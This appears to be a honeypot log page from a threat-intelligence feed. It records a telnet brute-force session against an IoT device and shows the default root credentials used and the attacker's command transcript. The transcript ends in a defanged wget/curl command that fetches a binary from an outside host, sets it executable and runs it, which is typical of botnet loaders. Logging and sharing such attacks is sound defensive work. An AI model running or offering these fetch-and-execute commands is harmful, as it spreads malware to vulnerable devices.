Attack #291754 telnet
Source: 94.243.8.23
Target port: 23
Authenticated: yes
Commands: 11
Duration: 3.8s
Session recording
Transcript
root
2011vesta
start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x42\x51\x57\x4f\x58\x4b'
/bin/busybox wget;/bin/busybox echo -ne '\x42\x51\x57\x4f\x58\x4b'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget hxxp://81[.]229[.]60[.]159:58639/i ||curl -O hxxp://81[.]229[.]60[.]159:58639/i ||/bin/busybox wget hxxp://81[.]229[.]60[.]159:58639/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x55\x5a\x46\x53\x4c\x46\x46\x59'
Credentials
Username: root
Password: 2011vesta
Geolocation hub-resolved
🇷🇺Russia · Tyumen Oblast · Tyumen
Behavioral classification
🦠
Matched signals:
- wget/curl download
- chmod/exec chain
- BusyBox probing
Reported to threat intel
AlienVault OTX ✓
HoneyMire Hub · open feed: / · API: /api · docs: /docs · blocklists: /blocklists · about: /about · firmware: github.com/HoneyMire/HoneyMire